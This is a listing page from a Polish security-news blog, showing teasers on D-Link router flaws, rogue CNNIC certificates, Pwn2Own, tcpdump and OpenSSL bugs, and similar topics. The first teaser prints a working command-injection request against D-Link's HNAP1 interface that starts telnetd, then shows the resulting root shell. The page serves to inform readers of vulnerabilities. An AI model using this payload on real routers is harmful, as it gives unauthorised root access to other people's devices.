Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: „http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”’ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is '^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…
Czytaj dalej »
Nie potrzeba tu zbyt wiele komentować. Warto jednak przyznać, że oprogramowanie z tytułu notki, przy instalacji lojalnie uprzedza, że trzeba zrestartować komputer, żeby UAC wyłączył się na trwale. Ale umówmy się – kto czyta komunikaty przy instalacji oprogramowania? A co więcej, kto ze zwykłych użytkowników je rozumie? ;-) –ms
Czytaj dalej »
W naszej platformie hackme / CTF – rozwal.to – mamy już niemal wszystko: domenę, logo, grafikę, 40 pierwszych flag do zdobycia i prawie 80 użytkowników którzy obecnie biorą udział w betatestach. Obecnie cięte są grafiki a w przyszłym tygodniu będą integrowane w platformę. Za około 3 tygodnie możecie się więc…
Czytaj dalej »
Brian Krebs opisuje ciekawy przypadek 'hackowania’ bankomatu. Mimo że fizyczne ataki na tego typu urządzenia nie są niczym nowym, to jednak profesjonalni przestępcy zazwyczaj robią to bardziej wyrafinowanymi narzędziami (jak choćby palnikami). Tym razem jednak użyto tradycyjnego brute force z wykorzystaniem narzędzi typu łom czy młot: Koszt zniszczeń samych…
Czytaj dalej »
W ostatnim czasie reaktywowaliśmy nasze prezentacje na polskich konferencjach i spotkaniach: koniec zeszłego roku – Secure (prezentacja dostała #1 miejsce za merytorykę, wyprzedzając nawet Mikko Hypponen-a – choć bez ściemy: sami nie czujemy się mocniejsi merytorycznie niż Mikko), niedawna prezentacja na poznańskim Ptaq, oraz tegorocznym Semaforze. Będziemy też niedługo z…
Czytaj dalej »
Ostatnio pisaliśmy o unieważnieniu certyfikatów SSL firmy MCS Holding. Przypominam – chodziło o podstawianie certyfikatów, aby podszyć się pod domeny Google (bez komunikatów o błędach w przeglądarce). Teraz Google idzie dalej i usunie w Chrome certyfikat root CA organizacji CNNIC – ze zbioru certyfikatów zaufanych (organizacja ta wydała „feralny” certyfikat…
Czytaj dalej »
Około roku temu ukazała się wersja trzecia standardu PCI-DSS (w skrócie: standard bezpieczeństwa narzucany firmom obsługującym karty płatnicze). Teraz został opublikowany dość szczegółowy dokument opisujący jak powinny wyglądać testy penetracyjne, które opisane są w samym standardzie. Dokładnie chodzi tutaj o wymaganie 11.3: Na czerwono zaznaczyłem przy okazji informację, która mówi…
Czytaj dalej »
Nasza platforma CTF/hackme jest już rozwijana w trybie beta od dłuższego czasu (można poprosić jeszcze o dostęp). Dzisiaj mamy już wersję beta grafiki. Niedługo całość dostępna będzie dla wszystkich :-) –ms
Czytaj dalej »
Zapraszamy na dwa mocno techniczne szkolenia organizowane przez Securitum: Warsztatowy kurs przygotowujący do CEHv8 (Certified Ethical Hacker) – (Warszawa, 13-17 kwietnia 2015). Mamy tutaj 5 dni dosłownie po brzegi wypełnione ćwiczeniami, a opinie odnośnie kursu też są całkiem dobre (reszta na stronie szkolenia): Szkolenie przygotowujące do egzaminu CEH prowadzone przez…
Czytaj dalej »
Google security blog informuje o wykryciu podrobionych (ale akceptowanych przez przeglądarki jako zaufane) certyfikatów dla kilku domen będących w posiadaniu Google. Certyfikaty zostały wystawione przez pośrednie CA (intermediate CA) – firmy MCS Holding, która otrzymała swój certyfikat od root CA chińskiej organizacji CNNIC. Root CA CNNIC jest w domyślnym cert…
Czytaj dalej »
Jak się zapewne domyślamy, wywiady różnych krajów realizują ataki cybernetyczne na wroga. Czy robią to legalnie / etycznie – to już inna kwestia. Oczywiście patrząc od strony służb – warto sprawę zalegalizować – patrz FBI, ale w tyle nie jest również wywiad brytyjski – aby sprawę nieco „uporządkować” przedstawiciele brytyjskiego…
Czytaj dalej »
Niedawno załoga z3s pisała o sukcesach naszego rodaka Mateusza Młyńskiego – w hackowaniu Firefoksa. Jednocześnie uczestnik konkursu Pwn2Own, o tym razem niepolsko brzmiącym nazwisku: Jung Hoon Lee, rozbił bank zgarniając $225 000. Zaczął od ataku na najnowszą wersję Chrome – uzyskując wykonanie kodu w OS z wyskoczeniem z sanbox-a (samo…
Czytaj dalej »
Już w 2014 roku wyszła na jaw operacja NSA polegająca na przechwytywaniu urządzeń Cisco w trakcie transportu i… montaż w nich backdoora (a następnie ponowne pakowanie i wysyłanie pod wskazany oryginalnie adres). Swoją drogą, czyż nie jest to idealny przykład, na którym można zilustrować atak sieciowy atak Man-in-The-Middle? Obecnie Cisco…
Czytaj dalej »
Na początku marca pojawiła się nowa wersja tcpdump-a łatająca błędy: CVE-2015-2153, 2154, 2155 oraz CVE-2015-0261. Na stronie tcpdumpa, informacja jest dośc lakoniczna, ale już w opisie łaty np. w Debianie, mowa jest o potencjalnym Remote Code Execution. Czyli w przypadku wysłania nam przez atakującego odpowiednio spreparowanego pakietu (lub spreparowania pliku…
Czytaj dalej »
12 błędów bezpieczeństwa w OpenSSL
Czytaj dalej »